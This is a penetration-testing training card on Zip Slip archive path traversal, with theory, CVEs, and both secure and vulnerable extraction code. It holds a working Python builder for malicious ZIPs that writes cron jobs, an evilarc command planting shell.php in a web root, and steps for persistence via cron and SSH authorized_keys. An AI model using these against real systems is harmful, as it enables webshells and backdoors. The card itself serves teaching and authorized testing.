Zip Slip Path Traversal: Archive Extraction Directory Escape for Server-Side File System Write

web_injection_logic Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Zip Slip was disclosed by Snyk in 2018 as a widespread vulnerability affecting thousands of open-source projects simultaneously. The research identified vulnerable extraction code in Java, Python, .NET, Go, and Ruby libraries. CVE-2018-1002201 (zt-zip), CVE-2018-1002202 (zip4j), CVE-2018-8009 (Apache Hadoop), and CVE-2018-10408 (multiple) are among dozens of assigned CVEs. The vulnerability allows an attacker who can submit an archive for server-side extraction to write arbitrary files to arbitrary filesystem paths, including startup scripts, cron jobs, SSH authorized keys, and web application configuration files. None of this requires code execution in the initial upload step.

Core Concept

An archive file (ZIP, TAR, JAR, WAR, APK, or any container format) stores a list of entries, each with a stored path that specifies where the file should be extracted relative to a destination directory. The vulnerability exists when extraction code uses the stored path directly — or after only a superficial check — without verifying that the resolved absolute path remains within the intended destination directory.

The path traversal payload in a Zip Slip archive contains entries with names like ../../etc/cron.d/backdoor or ../../../root/.ssh/authorized_keys. When a vulnerable extractor writes each entry to destination + entry.getName(), the ../ sequences cause the write to escape the intended extraction directory and land at an attacker-controlled absolute path.

The violated invariant is: the canonical absolute path of every extracted file must start with the canonical absolute path of the extraction destination. The correct check is:

canonical_dest = Path(dest).resolve()
canonical_file = (canonical_dest / entry_name).resolve()
assert str(canonical_file).startswith(str(canonical_dest) + os.sep)

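Without .resolve() or equivalent canonicalization, a naive prefix check passes: the joined string /tmp/extract/../../etc/cron.d/backdoor literally begins with /tmp/extract/, even though the operating system resolves it to /etc/cron.d/backdoor. The trailing separator in the comparison matters as well. Without it, a sibling directory such as /tmp/extract_evil would also match the prefix /tmp/extract.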
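The difference between the two checks can be sketched as follows. This is an illustration only: the function names are hypothetical, and posixpath.normpath is used as a purely lexical stand-in for canonicalization so the result is the same on any platform. Real extraction code should resolve against the actual filesystem (Path.resolve() or os.path.realpath) so that symlinks are followed too.

```python
import posixpath


def naive_is_inside(dest: str, entry_name: str) -> bool:
    """String-level prefix check on the un-normalized join (flawed)."""
    joined = posixpath.join(dest, entry_name)
    # The joined string still contains the "../" segments, so it
    # trivially begins with dest for every relative entry name.
    return joined.startswith(dest)


def canonical_is_inside(dest: str, entry_name: str) -> bool:
    """Collapse ".." first, then compare against dest plus a separator."""
    dest_norm = posixpath.normpath(dest)
    target = posixpath.normpath(posixpath.join(dest_norm, entry_name))
    # The trailing separator stops /tmp/extract_evil matching /tmp/extract.
    return target.startswith(dest_norm + posixpath.sep)


if __name__ == "__main__":
    for name in ("docs/readme.txt",
                 "../../etc/cron.d/backdoor",
                 "../extract_evil/x"):
        print(name,
              "naive:", naive_is_inside("/tmp/extract", name),
              "canonical:", canonical_is_inside("/tmp/extract", name))
```

Only the benign entry passes the canonical check, while all three pass the naive one.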

Exploitation impact depends on what the web server process can write. In the common case of a www-data user, writable targets include: cron jobs (if /etc/cron.d/ is world-writable or writable by www-data), the web application's own configuration files (overwriting database credentials or enabling debug mode), files in the web root (deploying a webshell without going through the upload filter), and ~/.ssh/authorized_keys if the home directory is accessible.
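Which of these targets are actually reachable depends on the account running the extractor. The following is a minimal sketch, meant to be run as that account on a system you are authorized to assess, that reports which candidate locations are writable. The candidate list and the web root path /var/www/html are assumptions for illustration, and os.access only reflects basic permission bits, so mandatory access controls such as SELinux or AppArmor may still block a write it reports as possible.

```python
import os

# Hypothetical candidate list based on the targets named above.
CANDIDATES = [
    "/etc/cron.d",
    "/var/www/html",            # assumed web root
    "~/.ssh/authorized_keys",
]


def writable_targets(candidates):
    """Map each candidate to True if the current process could write it."""
    report = {}
    for raw in candidates:
        path = os.path.expanduser(raw)
        # For a file that does not exist yet, what matters is whether
        # its parent directory is writable.
        probe = path if os.path.exists(path) else os.path.dirname(path)
        report[raw] = os.path.exists(probe) and os.access(probe, os.W_OK)
    return report


if __name__ == "__main__":
    for target, ok in writable_targets(CANDIDATES).items():
        print(f"{target}: {'writable' if ok else 'not writable'}")
```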

Technical Deep-Dive

# Crafting a malicious zip archive for Zip Slip
# Prerequisites: none (zipfile is part of the Python standard library)

import zipfile
import os

def create_zip_slip(output_path, target_file, payload_content, depth=6):
    """
    Create a ZIP containing a path-traversal entry.
    output_path:     where to write the malicious .zip
    target_file:     target path relative to the filesystem root
                     (e.g. etc/cron.d/evil); a leading / is stripped
    payload_content: str or bytes to write at the target
    depth:           number of ../ segments prepended to target_file
    """
    traversal = "../" * depth + target_file.lstrip("/")
    with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as zf:
        # Add a benign file first to look legitimate
        zf.writestr("readme.txt", "Legitimate archive contents.\n")
        # Add the malicious traversal entry
        zf.writestr(traversal, payload_content)
    print(f"[+] Created {output_path}")
    print(f"[+] Malicious entry: {traversal}")

# Example: write a cron job that creates /tmp/pwned
cron_payload = "* * * * * www-data touch /tmp/pwned\n"
create_zip_slip(
    output_path="evil.zip",
    target_file="etc/cron.d/pwned",
    payload_content=cron_payload,
    depth=8,
)

# ── Vulnerable extraction code (Java-style pseudocode) ────────────────────
# ZipFile zip = new ZipFile(uploadedFile);
# for (ZipEntry entry : zip.entries()) {
#     File outFile = new File(destDir, entry.getName());  // VULNERABLE
#     // No canonicalization check — ../  sequences traverse out of destDir
#     Files.copy(zip.getInputStream(entry), outFile.toPath());
# }

# ── Secure extraction (Python) ────────────────────────────────────────────
import zipfile, os, pathlib

def safe_extract(zip_path, dest):
    dest = pathlib.Path(dest).resolve()
    with zipfile.ZipFile(zip_path) as zf:
        for member in zf.namelist():
            target = (dest / member).resolve()
            # Ensure resolved path is inside dest
            if not str(target).startswith(str(dest) + os.sep):
                raise ValueError(f"Zip Slip attempt blocked: {member}")
            zf.extract(member, dest)

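# Note: zipfile's own extract()/extractall() already strip leading slashes
# and ".." components from member names, so the explicit check above is
# defense in depth. The filter="data" argument belongs to
# tarfile.extractall() (Python 3.12+), not to zipfile.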

# Detection: inspect archive entry names before extraction
python3 -c "
import zipfile, sys
with zipfile.ZipFile(sys.argv[1]) as z:
    for name in z.namelist():
        if '..' in name or name.startswith('/'):
            print('[!] Suspicious entry:', name)
" suspicious.zip

# evilarc tool for rapid malicious archive generation
python3 evilarc.py shell.php -f evil.zip -o unix -p "var/www/html/uploads/" -d 5
# -f: output archive, -o: target OS (win|unix),
# -p: path to include after the traversal, -d: traversal depth
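The entry-name check in the listing above only inspects the outermost archive. A sketch of how it might be extended to ZIP files nested inside ZIP files is shown below. The function names, the nesting limit, and the size cap are all assumptions made for this illustration. The size cap relies on the declared uncompressed size, which an attacker controls, and Windows drive-letter paths are not flagged, so this is a triage aid and not a defense.

```python
import io
import zipfile

MAX_NESTING = 3                        # assumed recursion limit
MAX_MEMBER_BYTES = 10 * 1024 * 1024    # assumed cap on nested members read


def is_suspicious(name: str) -> bool:
    """Flag absolute paths and any ".." path component."""
    parts = name.replace("\\", "/").split("/")
    return name.startswith(("/", "\\")) or ".." in parts


def scan_zip(data: bytes, prefix: str = "", level: int = 0) -> list[str]:
    """Return suspicious entry names, descending into nested ZIP members."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            label = f"{prefix}{info.filename}"
            if is_suspicious(info.filename):
                findings.append(label)
            if (level >= MAX_NESTING or info.is_dir()
                    or info.file_size > MAX_MEMBER_BYTES):
                continue
            inner = zf.read(info)
            # Recurse only when the member itself parses as a ZIP archive.
            if zipfile.is_zipfile(io.BytesIO(inner)):
                findings.extend(
                    scan_zip(inner, prefix=label + " -> ", level=level + 1))
    return findings
```

Calling scan_zip(open("suspicious.zip", "rb").read()) returns a list in which nested findings are labeled with the chain of containing archives.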

Security Assessment Methodology

Identify archive upload or processing endpoints: Look for file upload fields accepting .zip, .tar, .jar, .war, or similar. Also look for server-side features that fetch and extract remote archives (update mechanisms, plugin installers).
Inspect entry names in any provided archives: Use python3 -c "import zipfile,sys; [print(n) for n in zipfile.ZipFile(sys.argv[1]).namelist()]" archive.zip to list entries. Traversal entries in an archive the application already handles indicate a prior exploitation attempt or an upstream producer that does not sanitize entry names.
Craft a test archive with a safe canary path: Use evilarc or the Python script above to create a ZIP with an entry targeting a world-writable path (e.g., /tmp/zipslip_canary). Upload it and check whether the file was created.
Target web root for webshell write: If the web root path is known or guessable, craft an entry that resolves to <webroot>/zipslip_test.php containing <?php echo "ZIPSLIP"; ?>. Request the path and check for the echo.
Escalate to persistence: If /etc/cron.d/ is writable, write a cron job. If ~/.ssh/authorized_keys is reachable, write an SSH public key for persistence.
Verify library version: Check dependency manifests (pom.xml, requirements.txt, go.mod) for known-vulnerable extraction library versions as corroborating evidence.
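The canary step can be rehearsed locally before touching a real target. The sketch below builds a canary archive with a unique token, runs it through a deliberately vulnerable extractor that stands in for the application under test, and confirms the write by reading the token back. Everything happens inside a temporary sandbox directory. All function names and the file name zipslip_canary.txt are assumptions for illustration.

```python
import io
import os
import tempfile
import uuid
import zipfile


def make_canary_zip(depth: int, canary_name: str) -> tuple[bytes, str]:
    """Build a ZIP with one benign entry and one traversal canary entry."""
    token = uuid.uuid4().hex
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "benign entry\n")
        zf.writestr("../" * depth + canary_name, token)
    return buf.getvalue(), token


def naive_extract(data: bytes, dest: str) -> None:
    """Deliberately vulnerable stand-in for the application under test."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            out = os.path.join(dest, info.filename)  # no canonicalization
            os.makedirs(os.path.dirname(out), exist_ok=True)
            with open(out, "wb") as fh:
                fh.write(zf.read(info))


def canary_written(path: str, token: str) -> bool:
    """Confirm the write by content, not just by file existence."""
    try:
        with open(path) as fh:
            return fh.read() == token
    except OSError:
        return False


with tempfile.TemporaryDirectory() as sandbox:
    dest = os.path.join(sandbox, "uploads", "extracted")
    os.makedirs(dest)
    data, token = make_canary_zip(depth=2, canary_name="zipslip_canary.txt")
    naive_extract(data, dest)
    # Two levels up from uploads/extracted is the sandbox root.
    escaped = canary_written(
        os.path.join(sandbox, "zipslip_canary.txt"), token)
    print("canary escaped destination:", escaped)
```

Embedding a random token in the canary avoids false positives from a stale file left behind by an earlier test run.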

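Defensive Countermeasure: Canonicalize both the destination directory and each joined entry path, using Path.resolve() in Python, File.getCanonicalPath() (or Path.normalize() after resolving against the destination) in Java, or filepath.Clean + filepath.Abs in Go. Assert that the resolved entry path begins with the resolved destination path plus a path separator. In Python, zipfile's extract() and extractall() already strip leading slashes and .. components from member names; for TAR archives on Python 3.12+, pass filter="data" to tarfile.extractall(). In Java, prefer iterating entries with ZipInputStream and a manual canonicalization check over one-call library helpers such as zip4j's ZipFile.extractAll. Never extract archives as a privileged user.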
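For TAR archives in Python, the countermeasure might look like the sketch below. It assumes the tarfile extraction filters introduced in Python 3.12 (and backported to some earlier security releases), detects them with hasattr, and otherwise falls back to a manual canonical-path check. The function name safe_extract_tar is hypothetical, and the fallback rejects all link members as a simplification.

```python
import os
import tarfile


def safe_extract_tar(tar_path: str, dest: str) -> None:
    """Extract a TAR archive, refusing members that would leave dest."""
    with tarfile.open(tar_path) as tf:
        if hasattr(tarfile, "data_filter"):
            # The "data" filter rejects members that resolve outside dest,
            # along with absolute paths and unsafe links.
            tf.extractall(dest, filter="data")
            return

        # Fallback for interpreters without extraction filters.
        dest_real = os.path.realpath(dest)
        for member in tf.getmembers():
            if member.issym() or member.islnk():
                raise ValueError(f"Link member refused: {member.name}")
            target = os.path.realpath(os.path.join(dest_real, member.name))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError(f"Traversal attempt blocked: {member.name}")
        tf.extractall(dest)
```

Validating every member before extracting any of them keeps a rejected archive from leaving partial output in the fallback path.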

Common Assessment Errors

Only checking the outermost archive: Zip bombs and Zip Slip can be nested. Some extractors recursively extract archives found within archives. Test with nested malicious archives if the application extracts recursively.
Assuming the web server user cannot write to critical paths: Many deployments run as www-data with write access to configuration files, cron directories, or the web root. Test the actual write outcome, not a theoretical permission model.
Using absolute paths in the payload instead of traversal: If the extraction destination is /var/www/html/uploads/, an entry named /etc/cron.d/evil often fails because many extractors strip the leading slash and write to uploads/etc/cron.d/evil instead. Use ../ traversal sequences calibrated to the actual directory depth.
Overlooking JAR and WAR files: Java web application deployments frequently accept JAR/WAR uploads. These are ZIP-format archives. Apply the same Zip Slip test to JAR/WAR upload endpoints.
Not confirming the write actually occurred: Always verify the canary file exists at the target path. Upload success does not guarantee extraction occurred. Some applications delay extraction or process asynchronously.
Neglecting to test the depth of traversal needed: If the destination is /var/www/html/uploads/extracted/, reaching /etc/ requires five ../ segments, one for each directory level below the root. Extra segments are harmless on POSIX systems because .. at the root resolves to the root, so over-estimate the depth when it is unknown.
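The depth calculation can be sketched as follows, assuming the extraction destination is known as an absolute POSIX path. The helper names are hypothetical.

```python
import posixpath
from pathlib import PurePosixPath


def traversal_depth(dest: str) -> int:
    """Number of directory levels between dest and the filesystem root."""
    # parts for an absolute path starts with "/", which is not a level.
    return len(PurePosixPath(dest).parts) - 1


def traversal_entry(dest: str, target: str, extra: int = 0) -> str:
    """Entry name that reaches target (given from the root) out of dest."""
    depth = traversal_depth(dest) + extra
    return "../" * depth + target.lstrip("/")


if __name__ == "__main__":
    dest = "/var/www/html/uploads/extracted/"
    entry = traversal_entry(dest, "/etc/cron.d/evil")
    print(traversal_depth(dest), entry)
    # Lexically resolve the join to confirm where the write would land.
    print(posixpath.normpath(posixpath.join(dest, entry)))
```

Passing a positive extra adds surplus ../ segments, which is the usual approach when the real destination depth can only be guessed.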

NICE Framework Alignment

Code	Knowledge/Skill/Task Statement	How This Card Develops It
K0009	Knowledge of application vulnerabilities	Explains the canonicalization failure that enables arbitrary file write via archives
K0070	Knowledge of system and application security threats and vulnerabilities	Connects Zip Slip to real CVEs in widely-deployed Java and Python extraction libraries
S0001	Skill in conducting vulnerability scans and recognizing vulnerabilities in security systems	Trains canary-based testing methodology for archive extraction endpoints
S0044	Skill in mimicking threat behaviors to test defenses	Develops archive crafting skills using evilarc and Python zipfile
T0028	Conduct and support authorized penetration testing on enterprise networks	Provides a stepwise assessment procedure from endpoint discovery through persistence
T0591	Perform penetration testing as required for new or updated applications	Frames archive extraction testing as a required component of application assessments